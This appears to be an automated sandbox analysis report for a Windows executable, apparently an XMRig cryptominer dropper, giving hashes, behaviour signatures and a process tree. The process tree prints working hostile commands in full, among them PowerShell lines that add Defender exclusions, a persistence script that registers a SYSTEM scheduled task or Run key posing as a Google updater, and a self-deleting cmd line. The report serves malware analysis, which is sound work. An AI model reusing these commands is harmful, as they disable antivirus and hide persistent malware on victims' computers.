Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...Et.exe
windows7-x64
10grhsghsGHs...KX.exe
windows7-x64
10grhsghsGHs...Qp.exe
windows7-x64
10grhsghsGHs...ep.exe
windows7-x64
10grhsghsGHs...5e.exe
windows7-x64
10grhsghsGHs...EP.exe
windows7-x64
10grhsghsGHs...pS.exe
windows7-x64
10grhsghsGHs...HZ.exe
windows7-x64
10grhsghsGHs...Sj.exe
windows7-x64
10grhsghsGHs...Nq.exe
windows7-x64
10grhsghsGHs...Ey.exe
windows7-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
382s -
max time network
1794s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
25-01-2024 16:55
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231129-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231129-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/anDwkygzqtN6BKEt.exe
Resource
win7-20231129-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/bW3Td8vedKuGbSKX.exe
Resource
win7-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/cZ8JugqVuxAY52Qp.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/h5JMkDJvUkEMMWep.exe
Resource
win7-20231129-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/qM5GMXBk6hJE6Y5e.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/rUqNxUB6WWxdsfEP.exe
Resource
win7-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/rkUvkExvRhkxKUpS.exe
Resource
win7-20231129-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/u3GgbfA2e32fHMHZ.exe
Resource
win7-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/xQQTm7rAusnqpUSj.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/xxgg94VsN5GYyJNq.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1096 created 1248 1096 6vHkJ4UErTSS5ECD.exe 14 PID 1096 created 1248 1096 6vHkJ4UErTSS5ECD.exe 14 PID 1096 created 1248 1096 6vHkJ4UErTSS5ECD.exe 14 PID 1096 created 1248 1096 6vHkJ4UErTSS5ECD.exe 14 PID 2656 created 1248 2656 updater.exe 14 PID 2656 created 1248 2656 updater.exe 14 PID 2656 created 1248 2656 updater.exe 14 PID 2656 created 1248 2656 updater.exe 14 PID 1164 created 1248 1164 conhost.exe 14 PID 2656 created 1248 2656 updater.exe 14 -
XMRig Miner payload 29 IoCs
resource yara_rule behavioral3/memory/2088-70-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral3/memory/2088-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2632 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2656 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2184 taskeng.exe -
resource yara_rule behavioral3/memory/2088-64-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-70-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral3/memory/2088-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2656 set thread context of 1164 2656 updater.exe 50 PID 2656 set thread context of 2088 2656 updater.exe 53 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 6vHkJ4UErTSS5ECD.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2596 schtasks.exe 584 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1512 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e035a436b14fda01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1096 6vHkJ4UErTSS5ECD.exe 1096 6vHkJ4UErTSS5ECD.exe 2768 powershell.exe 1096 6vHkJ4UErTSS5ECD.exe 1096 6vHkJ4UErTSS5ECD.exe 2696 powershell.exe 1096 6vHkJ4UErTSS5ECD.exe 1096 6vHkJ4UErTSS5ECD.exe 1096 6vHkJ4UErTSS5ECD.exe 1096 6vHkJ4UErTSS5ECD.exe 2732 powershell.exe 2656 updater.exe 2656 updater.exe 2804 powershell.exe 2656 updater.exe 2656 updater.exe 1744 powershell.exe 2656 updater.exe 2656 updater.exe 2656 updater.exe 2656 updater.exe 1164 conhost.exe 1164 conhost.exe 2656 updater.exe 2656 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 2656 updater.exe Token: SeAssignPrimaryTokenPrivilege 1512 WMIC.exe Token: SeIncreaseQuotaPrivilege 1512 WMIC.exe Token: SeSecurityPrivilege 1512 WMIC.exe Token: SeTakeOwnershipPrivilege 1512 WMIC.exe Token: SeLoadDriverPrivilege 1512 WMIC.exe Token: SeSystemtimePrivilege 1512 WMIC.exe Token: SeBackupPrivilege 1512 WMIC.exe Token: SeRestorePrivilege 1512 WMIC.exe Token: SeShutdownPrivilege 1512 WMIC.exe Token: SeSystemEnvironmentPrivilege 1512 WMIC.exe Token: SeUndockPrivilege 1512 WMIC.exe Token: SeManageVolumePrivilege 1512 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1512 WMIC.exe Token: SeIncreaseQuotaPrivilege 1512 WMIC.exe Token: SeSecurityPrivilege 1512 WMIC.exe Token: SeTakeOwnershipPrivilege 1512 WMIC.exe Token: SeLoadDriverPrivilege 1512 WMIC.exe Token: SeSystemtimePrivilege 1512 WMIC.exe Token: SeBackupPrivilege 1512 WMIC.exe Token: SeRestorePrivilege 1512 WMIC.exe Token: SeShutdownPrivilege 1512 WMIC.exe Token: SeSystemEnvironmentPrivilege 1512 WMIC.exe Token: SeUndockPrivilege 1512 WMIC.exe Token: SeManageVolumePrivilege 1512 WMIC.exe Token: SeLockMemoryPrivilege 2088 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2696 wrote to memory of 2596 2696 powershell.exe 32 PID 2696 wrote to memory of 2596 2696 powershell.exe 32 PID 2696 wrote to memory of 2596 2696 powershell.exe 32 PID 2632 wrote to memory of 2588 2632 cmd.exe 36 PID 2632 wrote to memory of 2588 2632 cmd.exe 36 PID 2632 wrote to memory of 2588 2632 cmd.exe 36 PID 2732 wrote to memory of 1092 2732 powershell.exe 38 PID 2732 wrote to memory of 1092 2732 powershell.exe 38 PID 2732 wrote to memory of 1092 2732 powershell.exe 38 PID 2184 wrote to memory of 2656 2184 taskeng.exe 40 PID 2184 wrote to memory of 2656 2184 taskeng.exe 40 PID 2184 wrote to memory of 2656 2184 taskeng.exe 40 PID 1744 wrote to memory of 584 1744 powershell.exe 45 PID 1744 wrote to memory of 584 1744 powershell.exe 45 PID 1744 wrote to memory of 584 1744 powershell.exe 45 PID 2656 wrote to memory of 1164 2656 updater.exe 50 PID 2916 wrote to memory of 1512 2916 cmd.exe 51 PID 2916 wrote to memory of 1512 2916 cmd.exe 51 PID 2916 wrote to memory of 1512 2916 cmd.exe 51 PID 2656 wrote to memory of 2088 2656 updater.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1248
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2596
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1092
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2588
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:584
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:2876
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1164
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {36F07D75-EEF0-478B-A2D1-C525BFCA1AC3} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
496KB
MD538faa5fda4a8f382abd494b868b0cdaa
SHA1e4bdcee2c4804da4fd5149dd7e15399b57f2cdda
SHA256a0f09b7e804933cff6f60b81e0c56b540671b420180bcfe46661821c58d09efe
SHA512c5158ffd6a6fdbd1fb933bdb4a3372d320959fd50f1f22f6fca7c8f2acb13f557c61ae320f80f2d1fd6c8256f7ab8446b3e30317dca1637907af945757d8b84a
-
Filesize
1.5MB
MD5010b9d50df0dabe227c0924fbd0a17d0
SHA1449093fdca2c063e7d0ac682482b6d9ace411b4b
SHA256edebb3a0ef6b057cfdb15f0fed288965ff2882f62e488a70a6e222fd1cd80b5b
SHA512bff167980bbc125b218b46ad36386c7df0f77ed0a41cc91c30a3dbd04468cadccf0e25b7858f04e12764c36192a7e848051c048d4efa291dcf46630f177fb05e
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J2RTU1MM9BBU1P7PQZFH.temp
Filesize7KB
MD52c358b6caa6898e103466e06288ebc97
SHA10fa131fb80b99afd978443f961e0feed3ca0b19a
SHA25618c8ad88a3560a33b850f97a36c474e87d72549b520b8c1f0f3d24bedd89143c
SHA512d3fbb1916654bb71b5b084d7cb33f1b66db6db2c7b8cc936b638c657fba3224a03916b8673d3d48694f3dc96928c3789a2c2293a474fffc4a767ff6a69bc6872
-
Filesize
541KB
MD5a46fa03f6a0e30cf428278de81239736
SHA1adfc28f029f91abaafd0bb9a66281b3e84babf34
SHA2561c8e2a1b978fac76c0bf6e1aa6742a572d5f911e8a297a1be5fe51ae091c7f3b
SHA512f65360e7370f5951c1f660b5b77bd7222e256b3526c79a3bef11e32eb099ff22677d3da9076b334a9a4650945296440324e9534cc3a22f0c36fc0c31f3cc4baa